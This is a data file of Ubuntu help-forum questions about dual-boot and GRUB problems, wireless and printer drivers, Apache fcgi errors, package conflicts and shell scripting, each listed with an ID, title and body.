351612	issues downloading and installing ubuntu iso alongside win7	when downloading the iso it downloads normally for awhile displaying that i have a few hours to wait and then randomly jumps to complete . upon attempting to burn the iso to usb to install the pendrive program claims numerous file errors and then completes the format of my usb . when i attempt to boot from the usb during post it either comes up with nothing and forces me to reboot my laptop or comes up that i 'm missing files and that the boot can not continue . can anyone help me with this issue ?
351613	error 403 when accessing fcgi files / apache	i have installed apache & mod_fcgid trough the following command sequence : sudo apt-get install apache2 sudo apt-get install libfcgi-dev i than placed my compiled index.fcgi file into the web root ( /var/www/ ) . in that same directory i created a .htaccess file with the following lines in it : sethandler fcgid-script options +execcgi order allow , deny allow from all when i then start my apache using sudo service apache2 restart and browse to http : //localhost/index it gives me a 403 response header . what did i do wrong and how do i fix this ? i would like to mention i also have php 5 installed on this same server . sudo apt-get instal php5
351615	`` no-entrance '' icon remains in top panel	i just installed ubuntu 13.10 . in the upper right hand corner , instead of the gear icon , a no-entrance icon keeps being displayed , even after reboot . what does that mean ? it looks like this :
351618	how to install ubuntu on new hard drive	my desktop hard drive crashed , but i had just saved a disk image using redo that i had installed on a flash drive . ( lucky me i thought ! ) i had a dual boot , windows 7 and ubuntu 13.04 . i bought a new hard drive and proceeded to restore using redo . everything seemed to go well , but the computer wo n't boot from the hard drive . i tried hiren 's boot cd and the ultimate boot cd , but i 'm outta my league and not sure what i 'm doing . i managed to partition the new drive into one and format it . then i booted to ubuntu installation on my flash drive and installed just ubuntu on the hard drive . ( i figured i would be happy with that ! ) again , everything seemed to go well and the installation completed normally . but again , it wo n't boot from the hard drive . it just goes into a loop , showing the intel splash screen and then saying 'no signal ' and back again to the splash screen , looping over and over . what did i mess up ? thanks rick
351622	linux vs windows 7	i 've inherited a nice small laptop with linux on it . i am used to windows word , live mail etc . shall i uninstall linux and install windows ? if i stay with the linux , what should i use for security , as i wo n't have microsoft security essentials ? please help !
351626	bluetooth adapter not found in hp pavillion 15 with ubuntu 12.04 lts	i am using ubuntu 12.04 lts on my hp pavilion with dual boot alongside with windows 8 . bluetooth is not working in ubuntu . no bluetooth icon in taskbar , at desktop by clicking an icon of bluetooth in system settings shows no bluetooth adapter found .
351628	install gives black screen after selecting side by side 12.04/8	i feel like i have followed the instructions . i am using a new dell e7440 with windows 8 . i set up a usb boot stick ( from which i was able to `` try '' ubuntu ) . i altered the bios ( fastboot changed from minimal to thorough ( there was no `` off '' selection , but the wording seems to be that thorough is off ) and i changed win8 setting of fast start up . i could find no reference to intel smart response ) . additionally uefi was not enabled , rather legacy rom was . so after selecting side by side and `` continue '' i got a black screen and then a restart and windows 8. sigh . i do n't know what else to do . i tried to get the boot repair following the instructions , but there was an error about https and ppa . help please ?
351629	epson scanner v600 not working	can not get my v600 usb scanner to work . looking for epson drivers , i found this site . i downloaded drivers there : iscan_2.29.1-5~usb0.1.ltdl7_amd64.deb iscan-data_1.23.0-1_all.deb and installed them . but my scanner is still not recognized . i use ubuntu 13.04. simple scan , iscan or xsane scan can not see the device .
351635	grub error : unknown file system , grub rescue	i get the grub error unknown file system , grub rescue after i deleted my vista partition and allocated some unused space to make it bigger . for some reason , i am unable to boot from my ubuntu 12 live disc , so i used my backtrack disc and was able to mount my ubuntu partition and was able to see all my other windows partitions as well . everything is intact except that the ubuntu partition shows as `` 31 gb filesystem '' while the other windows partitions are okay and shows as `` winxp '' `` win7 '' i am also able to see the grub.cfg in the `` 31 gb filesystem '' partition . anyway , how can i restore grub the easiest way using backtrack or other possible methods ? or my second choice to just get my windows to boot up ? i ca n't burn any discs and my pc is old so it doesnt have the capability to boot from a usb . i have researched for hours and have yet to find something similar to my situation . please help ( also i am not really a linux user , i most of the time use windows xp / 7 , that 's why my impt programs are there and i do n't mind reinstalling unbuntu if need be.. would that be a possible way to restore grub as well without affecting any data loss from windows etc ? well never mind , i ca n't even do that because my ubuntu live disc wo n't boot up . help ! !
351638	windows flickering on dell n5100 ( inspiron 15r ) , ^ @ on terminal	i have ubuntu 12.04 on my dell n5100 ( inspiron 15r ) . some time after booting up , windows and menus start flickering randomly . i thought it was a graphics card issue until i went to a virtual terminal while the flickering was happening ( ctrl + alt+ f1 ) , and it was spitting out '^ @ ' characters randomly , at around the same frequency as the flickering . could this be an issue with one of dell 's special keys ?
351639	how to install the ubuntu sdk on debian ?	is it possible to get the ubuntu sdk on debian ? these ppa things look like links.. and definitely do n't work on a debian system . any thoughts on that ? or is this a crappy idea ? i just want to play around a little with ub.touch and maybe program some small apps for desktop or touch . ( probably just touch , so i wo n't have to remove debian and install ubuntu - seems like a waste of time ) somehow its related to : is it possible to install the ubuntu sdk in gentoo ? but specific for debian , which should n't be too different to ubuntu .
351646	how can i have sound on my laptop toshiba l35 ?	i just installed the latest version of ubuntu on my toshiba satellite l35 but i found out there is no sound coming out , i search on internet about this issue and it did n't work . ubuntu knows there is a sound card but i do n't have it . i checked there is a similar issue in this thread : sound problem with toshiba satellite l35-sp1011 but i did n't understand it . i input commands into the terminal but i do n't get it .
351648	include fedora with ubuntu grub	i have a dual boot set up with windows 7 and ubuntu 12.04 on my primary disk . i have second disk for storage and free space . i installed fedora 19 on the second disk and tried to update grub in ubuntu , but fedora is not picked up . i would like to keep ubuntu 's grub controlling everything as i am most familiar with how to manipulate it . by the way , i did make sure the fedora partition was mounted before updating grub . how can i add fedora to grub ? i have been looking around for several days with no success to accomplish this . thanks everyone .
351650	issue with rosewell network adapter	when running the install.sh script for my roswell network adapter rnx-n180ube i get an error can not change ownership to uid 1007 , gid 501 : operation not permitted if anyone has any experience with this , i would greatly appreciate the help , it 's my first day working with ubuntu full script : http : //pastebin.com/jq0uvgje
351651	can i install a dualboot and start the windows boot from linux terminal ?	so i 've been having fun so far with my new linux installation . for some programs i need to run for school i need to install a dualboot for windows , but i do n't like the grub loader where you need to choose which installation to run . i just want it to start my linux installation and if i want to go to windows i want to use a terminal command or something from within the linux installation to go to the windows installation . so is this possible ? and if so how ? -- -- -- -- -- -- -- solution -- -- -- -- -- how to reboot into windows from ubuntu ?
351654	retrieving the proprietary blobs from android for ubuntu touch	i 'm following the porting guide for my samsung galaxy note gt-n7000 . i 'm at the part where i need to get the proprietary files from cyanogenmod . the wiki guide states : tip : you can alternatively extract these binaries from the image ( which is essentially a .zip file containing , amongst others , these binary files ) , but flashing it first helps as you can see if cm is working properly in the device . i already know cm works on the device , so i 'd like to skip that step . but which files do i copy ? that 's not made clear .
351656	outdated rosewell adapter driver	someone suggested that this error when running the install.sh script for my roswell network adapter rnx-n180ube was caused by these drivers not being compatible with ubuntu 13.04 , is this the case , and if so , what can i do about it ? authentication requested [ root ] for make driver : make arch=x86_64 cross_compile= -c /lib/modules/3.8.0-31-generic/build m=/home/user/desktop/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.8.0-31-generic' cc [ m ] /home/user/desktop/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_cmd.o in file included from /home/user/desktop/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_cmd.c:23:0 : /home/user/desktop/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/osdep_service.h : in function ‘thread_enter’ : /home/user/desktop/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/osdep_service.h:575:2 : error : implicit declaration of function ‘daemonize’ [ -werror=implicit-function-declaration ] in file included from /home/user/desktop/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/drv_types.h:69:0 , from /home/user/desktop/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_cmd.c:24 : /home/user/desktop/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_recv.h : in function ‘rxmem_to_recvframe’ : /home/user/desktop/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_recv.h:626:30 : warning : cast from pointer to integer of different size [ -wpointer-to-int-cast ] /home/user/desktop/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_recv.h:626:9 : warning : cast to pointer from integer of different size [ -wint-to-pointer-cast ] cc1 : some warnings being treated as errors make [ 2 ] : *** [ /home/user/desktop/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_cmd.o ] error 1 make [ 1 ] : *** [ _module_/home/user/desktop/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.8.0-31-generic' make : *** [ modules ] error 2
351660	will reinstalling ubuntu mess with grub ?	my computer has windows 7 and ubuntu 12.04 on a dual boot with grub , and i want to upgrade to 13.04 with a fresh install and grow the partition . the method i want to follow is this one : go to the windows disk management and format swap and ubuntu partition grow partition with disk management ( from 30 gb to 120 gb ) boot on bootable usb stick install ubuntu 13.04 along side windows 7 like in this post my questions are : will this mess with grub ? ( more unusable boot options or something ) is it safer to use windows disk manager application for formatting the partitions instead of gparted ? imagine i ca n't install ubuntu after i formatted the partitions , will this make my machine unbootable ? how do i solve this ?
351662	keyboard or mouse do n't work after upgrade to ubuntu 13.04	i have installed ubuntu on my old emachine t6528 . i have been a windows developer and am beginning to switch to java -- thus linux and ubuntu . i started with 12.04 as it fits on a cd . the emachine does n't have a dvd drive . it works fine with 12.04 , but after upgrading to 13.04 the only thing that happens is the logon screen asking for a password . the keyboard and mouse do not work . i have tried booting in safe mode by depressing the left shift key , but this does n't work . likely related to the fact that the keyboard does n't work . i tried reinstalling 12.04 several weeks ago and let it settle in for a while . but the upgrade again disables my keyboard and mouse . i can still boot from the cd , but i am not sure how that might help , or what i might do .
351667	how to set the ssh variable for an existing `ssh-agent` process ?	gnome-session starts ssh-agent : sds 2104 1993 0 13:06 ? 00:00:00 gnome-session -- session=ubuntu sds 2142 2104 0 13:06 ? 00:00:00 /usr/bin/ssh-agent /usr/bin/dbus-launch -- exit-with-session gnome-session -- session=ubuntu what does it do with the its output ? i mean , normally ssh-agent prints something like ssh_auth_sock=/tmp/ssh-rdnonpv10910/agent.10910 ; export ssh_auth_sock ; ssh_agent_pid=10911 ; export ssh_agent_pid ; echo agent pid 10911 ; which can be redirected to a file and then sourced from ~/.bashrc . it appears that gnome-session sets these ssh variables in its environment ( and thus they are available to its descendants ) , but what about processes which are not descended from it ? ( e.g. , screen sessions which were started in a previous gnome session ) i guess i can extract the variables from /proc/ $ ( pgrep gnome-session ) /environ , but this quickly gets hairy ( there may be several gnome sessions by different users running on this box ) .
351669	non-working realtek wireless card on toshiba satellite l75d-a7280	just bought a toshiba satellite l75d-a7280 . immediately dropped windows 8 for artistx . apparently corrupted .iso , so i reinstalled with a new .iso ( after they upgraded their build to 13.04 , apparently ) then just decided the whole thing was just too bloated so decided the smartest thing for someone that has n't ever touched a terminal to do is go to the last lts , 12.04 . throughout all of my ridiculous floundering there has been one constant since dropping windows ; no wireless support . i am currently on the machine in question hooked directly to my router . no problems there . i 've tried going on the toshiba support website and downloading the drivers but there 's no indication i 'm not doing it wrong . i 've done some looking around online and learned to type lshw and , concerning the network , i get this : *-network unclaimed description : network controller product : rtl8188ee wireless network adapter vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:05:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : latency=0 resources : ioport:2000 ( size=256 ) memory : f0100000-f0103fff and also , and it may be an unrelated issue , i have a serial saying it 's unclaimed as well . it 's a hynex semi-conductor , apparently . i do n't know what that is . i 'm seeing a lot of posts about the rtl8188 but they seem to be in greek ( or unix , very little difference to me ) so if someone could eli5 ( or like i 'm a 30 year old man that has only just now walked away from windows , anyway ) i would appreciate it greatly . kinda dove in head first and landed immediately over my head i guess .
351672	ubuntu dual boot with windows 8 installation problem	dell 7440 256 g ssd hd 4 g ram windows 8 i 'm trying to install 12.04 side by side . i altered the bios , created the usb stick which allowed me to `` try '' with success . installation was another story . i am unable to install side by side - have followed the instructions at : http : //www.ubuntu.com/download/desktop/install-desktop-long-term-support http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-windows https : //help.ubuntu.com/community/uefi i am not using secure boot , have disabled windows 8 fast start and am running legacy not uefi across the board ... i have run boot repair three times ( i tried disabling additional stuff in bios ) : http : //paste.ubuntu.com/6173133 http : //paste.ubuntu.com/6173179 http : //paste.ubuntu.com/6173267 any thoughts ?
351673	how can i recover the access of an account after a graphics card installation ?	after installing the amd hd7770 videocard and installed the driver packages ( which probably went wrong ) i started to encounter 2 issues ... the first issue that i have is getting into the account i used to install the drivers on . after entering a correct password the screen becomes black and returns to the login screen . i was not able to fix this using google . the second issue is that my mouse becomes super laggy when the card is plugged in . please take note that the system used an onboard graphics chip before the card install .
351676	says that my computer is running in low-graphics mode , but can not run failsafe x . how do i fix this ?	when i start up my computer it tells me i am running in low graphics mode . i 've read tutorials on how to fix this and they all say i need to run failsafe x . when i try to run failsafe x nothing happens . my screen starts out black and sort of fades to a bluish and then to an orangeish and then to black , but nothing else happens . what the heck is going on and how do i fix it ?
351679	removing a string of files with rename	i have been trying to batch rename a bunch of files so that they are consistent and fit within the name structure that i have come up with . for instance , i am renaming comics , and so i have a directory that looks like this : $ ls *.cbr injustice - gods among us 001 ( 2013 ) ( digital ) ( k6 of ultron-empire ) .cbr injustice - gods among us 002 ( 2013 ) ( digital ) ( k6 of ultron-empire ) .cbr injustice - gods among us 003 ( 2013 ) ( digital ) ( k6 of ultron-empire ) .cbr my goal is to use rename the files so they look like the following : injustice - gods among us 001.cbr injustice - gods among us 002.cbr injustice - gods among us 003.cbr so i tried the following : rename -n 's/^\d { 3 } .\.cbr/^\ $ 1.cbr/ ' *.cbr was assuming that by delimiting to the first set up on the 3 digit issue , i could then change to rename everything starting from the beginning line ( injustice - god among us ) and add in the 3 digit issue number ( \d { 3 } ) everything would pan out . needless to say , it did n't . although i would like a little direction on how to get this solved , i really want to better understand how to leverage using pregex for future use .
351680	wifi issue . dell latitude e6400 ubuntu 12.04	fresh install of 12.04 on a dell latitude e6400 and came up with the wireless issues . i 'm fairly new to linux command line , but have been using ubuntu for several years now on a dell d630 so i researched , sudo 'd , reinstalled and now the light turns on and off with the external switch and im able to enable the wireless option in the connectivity settings but it still wont see any wifi networks . anyhow i obviously need help to get it to connected . here 's the results from the following commands : lspci 00:00.0 host bridge : intel corporation mobile 4 series chipset memory controller hub ( rev 07 ) 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:02.1 display controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:19.0 ethernet controller : intel corporation 82567lm gigabit network connection ( rev 03 ) 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 03 ) 00:1a.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 03 ) 00:1c.1 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 2 ( rev 03 ) 00:1c.2 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 3 ( rev 03 ) 00:1c.3 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 4 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev 93 ) 00:1f.0 isa bridge : intel corporation ich9m-e lpc interface controller ( rev 03 ) 00:1f.2 ide interface : intel corporation 82801ibm/iem ( ich9m/ich9m-e ) 2 port sata controller [ ide mode ] ( rev 03 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 03 ) 00:1f.5 ide interface : intel corporation 82801ibm/iem ( ich9m/ich9m-e ) 2 port sata controller [ ide mode ] ( rev 03 ) 03:01.0 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller ( rev 04 ) 03:01.1 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 21 ) 03:01.2 system peripheral : ricoh co ltd r5c843 mmc host controller ( rev 11 ) 0c:00.0 network controller : broadcom corporation bcm4322 802.11a/b/g/n wireless lan controller ( rev 01 ) lsusb bus 005 device 002 : id 0a5c:5800 broadcom corp. bcm5880 secure applications processor bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub ifconfig eth0 link encap : ethernet hwaddr 00:26 : b9 : c1:6a:60 up broadcast multicast mtu:1500 metric:1 rx packets:99 errors:0 dropped:0 overruns:0 frame:0 tx packets:165 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:31276 ( 31.2 kb ) tx bytes:18964 ( 18.9 kb ) interrupt:22 memory : f6ae0000-f6b00000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:44 errors:0 dropped:0 overruns:0 frame:0 tx packets:44 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:4684 ( 4.6 kb ) tx bytes:4684 ( 4.6 kb ) wlan0 link encap : ethernet hwaddr 78 : e4:00:12:08:39 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) iwconfig wlan0 ieee 802.11bg essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : off lo no wireless extensions . eth0 no wireless extensions . lshw -c network *-network description : ethernet interface product : 82567lm gigabit network connection vendor : intel corporation physical id : 19 bus info : pci @ 0000:00:19.0 logical name : eth0 version : 03 serial : 00:26 : b9 : c1:6a:60 capacity : 1gbit/s width : 32 bits clock : 33mhz capabilities : pm msi bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e1000e driverversion=2.1.4-k firmware=1.7-7 latency=0 link=no multicast=yes port=twisted pair resources : irq:44 memory : f6ae0000-f6afffff memory : f6adb000-f6adbfff ioport : efe0 ( size=32 ) *-network description : network controller product : bcm4322 802.11a/b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0c:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=b43-pci-bridge latency=0 resources : irq:17 memory : f69fc000-f69fffff *-network description : wireless interface physical id : 2 logical name : wlan0 serial : 78 : e4:00:12:08:39 capabilities : ethernet physical wireless configuration : broadcast=yes driver=b43 driverversion=3.8.0-30-generic firmware=508.1084 link=no multicast=yes wireless=ieee 802.11bg nm-tool networkmanager tool state : disconnected - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : b43 state : disconnected default : no hw address : 78 : e4:00:12:08:39 capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : e1000e state : unavailable default : no hw address : 00:26 : b9 : c1:6a:60 capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : off laptop connects no problems through the wire , if you look at nm-tools it says the wireless is disconnected . so how do i get it to say connected ?
351681	is it possible to install microsoft office without a cd ?	i have been a windows user since ... well ... always . now i decided to try linux ubuntu , and found out it looks way much better . the problem is , i am a student and constantly need microsoft word/excel/powerpoint , and libreoffice just is n't the same thing . when i have to update something on excel , when i open the same archive on windows some formatation of it is changed . that 's why i would like to install microsoft windows . i do not have the installation cd . however , i already have the microsoft office installed on windows . i have tried the convenient methods to install it through playonlinux , but i keep stuck on this part http : //i.stack.imgur.com/2gpmt.png from : can wine support office 2007 ? my question is : can i install it through the archives it created on windows when it was there installed or would i really need the cd for that and , therefore , not being able to install ? would i be able to borrow a cd from someone ? thank you .
351682	ca n't download windows installer wubi	i was trying to download the windows installer through the link provided on the page for the 12.04 version , but it is giving me to download the 707mb of iso file which i already have . please can anyone help me on this one ? thank you .
351690	how do i retrieve my windows 8 boot after ubuntu 13.04 installed ?	i have lenovo g480.. before i installed ubuntu , i had my win8 uefi change from boot secure to legacy..now i ca n't boot windows 8 because the boot file is missing ? ..btw i still can see my files from windows 8 partition in the ubuntu..
351692	error mounting hd	i 've got 4 hd , 1 ssd for the system and 3 sata hd for data . i had some problems with windows and i decided to format my system hd ( without partitions ) and install just ubuntu . i 've installed ubuntu , and now it can mount only 1 hd . for the other 2 hd i received the following message : error mounting /dev/sda5 at /media/arberto/robetta new : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda5 '' `` /media/arberto/robetta new '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda5 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . i 've read a lot of questions and answers about my problem , but everyone say to deactivate hibernation in windows 8 ... but i have no more windows 8 ! i read it could be related to a file , hiberfile.sys . how can i delete it ? i do n't care about not saved sessions , and after all they are only data disks . i 've already do that : unable to mount windows ( ntfs ) filesystem due to hibernation but i want to write on that disks , and i do n't want to mount them every time i start my pc .
351693	no wifi ubuntu 12.04 toshiba satellite p775-s7100	does anyone know how to get wifi working on my toshiba satellite p775-s7100 ? my ethernet works fine , just no wifi , which works fine on my windows partition .
351694	a screens-question	i 'm trying to have a quick overview over my servers stats , so i 'm writing a little sh script , but i do n't really get it right . # ! /sh/bash screen -amds mgmt screen -s mgmt -x screen -t htop htop screen -s mgmt -x screen -t iftop iftop screen -s mgmt -x screen -t sensors watch sensors -c /home/ken/sensors.conf screen -r mgmt this nearly works , my problem is , that this results in 4 `` tabs '' , but i do n't want the 4th tab ( which is page 0 ; `` bash '' ) i tried this and several other commands , without success # screen -s mgmt -p 0 -x htop -t htop thanks in advance !
351695	how can i find the currently playing song in banshee ?	is there any way to quickly go to the song currently playing in banshee ? maybe double-clicking something ? my library is quite large , and scrolling to the currently playing song after i 've scrolled several songs down can be challenging .
351696	help with offlineimap misadventures	after deciding to bite the bullet and have mutt stop doing an imap connection directly to gmail , i installed offlineimap . i decided that i only wanted to the inbox , sent mail , and archives , so i proceeded to remove all of the labels to that i did n't end up with a million maildir directories . probably not the best idea that i had on the issue . when i started the initial download of my mail , things looked well , but i noticed that there was a lot of deletion going on . when everything was finished , my sent folder on the mutt side ( as well as the gmail web interface side ) showed that i had no sent mail at all . imagine my shock to go from thousands of response emails to absolutely nothing . upon a little playing on the web side of gmail , all of the messages were there , but it just did n't show up in the sent messages . also , i noticed that when i sent a message under mutt , after the message was sent , the message would stay in the sent box for a couple of minutes , and then disappear . again , if i go to the web version of gmail , although it is gone from the sent box , if i do a search for mail , the sent message shows up . [ general ] metadata = ~/.offlineimap accounts = foobar maxsyncaccounts = 2 socktimeout = 60 ui = basic [ account foobar ] localrepository = foobar-local remoterepository = foobar-remote status_backend = sqlite postsynchook = notmuch new # this helper file lets you use gnome-keyring to store usernames / passwords pythonfile = ~/.mail/lib/offlineimap-helper.py # exclude these mailboxes from the above mailbox list folderfilter = lambda accountname , foldername : not re.search ( ' ( ^bak.*|.*drafts $ |.*spam $ |.*sent $ | . *trash $ ) ' , foldername ) peritem = `` + % ( accountname ) s/ % ( foldername ) s '' sep = `` `` footer = `` \n '' [ repository foobar-local ] type = maildir cert_fingerprint=f3043dd689a2e7dddfbef82703a6c65ea9b634c1 localfolders = ~/.mail/foobar-gmail.com # note the nametrans below in remote-gmail : it undoes this one nametrans = lambda foldername : re.sub ( 'inbox ' , 'inbox ' , re.sub ( 'drafts ' , ' [ gmail ] .drafts ' , re.sub ( 'sent ' , ' [ gmail ] .sent mail ' , re.sub ( 'flagged ' , 'starred ' , re.sub ( '_ ' , ' ' , foldername.capitalize ( ) ) ) ) ) ) [ repository foobar-remote ] type = gmail maxconnections = 2 # remotehost = imap.gmail.com # remoteusereval = get_username ( `` imap.gmail.com '' ) # remotepasseval = get_password ( `` imap.gmail.com '' ) remoteuser = foobar @ gmail.com remotepass = mypassword # if using ssl , you will need to specify certificates to use with them ssl = yes sslcacertfile = /etc/ssl/certs/ca-certificates.crt realdelete = no # note the nametrans above in local-gmail : it undoes this one nametrans = lambda foldername : re.sub ( '^\ [ gmail\ ] \/ ' , '' , re.sub ( 'sent_mail ' , 'sent ' , re.sub ( 'starred ' , 'flagged ' , re.sub ( ' ' , '_ ' , foldername.lower ( ) ) ) ) ) # we do n't want to sync all mail , it would pull everything again folderfilter = lambda foldername : foldername not in [ ' [ gmail ] /all mail ' ] so any ideas what i might be doing wrong ?
351697	dual boot windows 8 & ubuntu	i have 3 partitions with windows 8 installed in the first one then i installed ubuntu in the second one . by the end of the installation , my pc reboot on ubuntu and does n't show windows8 . so i run boot repair , but it gives me windows vista loader on sda1 and when i click on it , it shows me a black screen . this the report of boot-repair i 've been looking over 8 hours for a solution and i looked up to every thread about this problem , but no one worked for me .
351698	lenovo twist touchpad problems	i have a lenovo twist ( laptop that converts to a tablet ) win 8 with a touchscreen . i 've tried to load several versions of linux and the problem i run into is the touchpad is not recognized . the touchscreen works but the touchpad is n't loaded when i go into control panel . i posted on a different forum and was told i should do a insmod psmouse but that did't work . any idea how i can load drivers for my touchpad ?
351703	installing a local package to replace an already installed one	i 'm trying to install a locally built .deb file that will replace an installed package . attempting to use dpkg -i results in this : dabo @ chrubuntu : ~/downloads/mali $ sudo dpkg -i chromium-mali-opengles_0.45-0ubuntu1_armhf.deb dpkg : considering removing libegl1-mesa : armhf in favour of chromium-mali-opengles : armhf ... dpkg : no , can not proceed with removal of libegl1-mesa : armhf ( -- auto-deconfigure will help ) : libegl1-mesa-drivers : armhf depends on libegl1-mesa ( = 9.1.4-0ubuntu0.1 ) libegl1-mesa : armhf is to be removed . dpkg : regarding chromium-mali-opengles_0.45-0ubuntu1_armhf.deb containing chromium-mali-opengles : armhf : chromium-mali-opengles conflicts with libegl1-x11 libegl1-mesa : armhf provides libegl1-x11 and is present and installed . dpkg : error processing chromium-mali-opengles_0.45-0ubuntu1_armhf.deb ( -- install ) : conflicting packages - not installing chromium-mali-opengles : armhf errors were encountered while processing : chromium-mali-opengles_0.45-0ubuntu1_armhf.deb when i try to uninstall libegl1-mesa , it uninstalls a ton of other packages that depend on it as well . is there a way i can install chromium-mali-opengles_0.45-0ubuntu1_armf.deb ? the one thing i 'd think of doing is using dpkg -- get-selections to save all the package names , uninstalling libegl1-mesa and all of its dependencies , installing chromium-mali-opengles , and then restoring the rest of the packages with dpkg -- set-selections . would that be an incredibly bad idea ? i 'm also pretty sure something like aptitude would allow me to uninstall one and install another at the same time , without uninstalling all of the packages which depend on it . though i do n't know of any way to use aptitude to do this . i 've also tried using gdebi , thinking that it might have more dependency management , but it gives the same error dpkg gives .
351705	changing gnome lock screen	ubuntu 13.04 gnome desktop : 3..6.2 does anyone now if it is possible to add this specific lock theme with the above versions ? i ca n't find the `` apps/gnome-screensaver '' referenced in the configuration editor . http : //gnome-look.org/content/show.php/nsa+lock+screen+ % 28ubuntu+10.04 % 29 ? content=125033
351706	where should i install grub ?	i formatted my laptop due to messing up grub and mbr . and i do n't want that to happen again , so ... where is the correct partition that i should install grub ? my partitions are system reserved ( /dev/sda1 i beleive ) windows 8 ( /dev/sda2 ) the next ones are not made but are supposed to be as i list when i create them : ubuntu ( /dev/sda3 ) pear os 8 32-bit ( /dev/sda4 ) swap partition ( 2gb /dev/sda5 ) now , where should i put grub ? !
351707	issues with canon lbp6000 printer driver	i 've been trying to install canon 's lbp6000 printer in ubuntu 13.04 with no success . i downloaded the driver from canon 's website and tried various solutions across the web , including the radu script ( http : //radu.cotescu.com/how-to-install-canon-lbp-printers-in-ubuntu ) . all the solutions i 've found are at least a year old and deal with an older driver ( 2.40 instead of 2.60 ) and version of ubuntu . thanks for any help or advice .
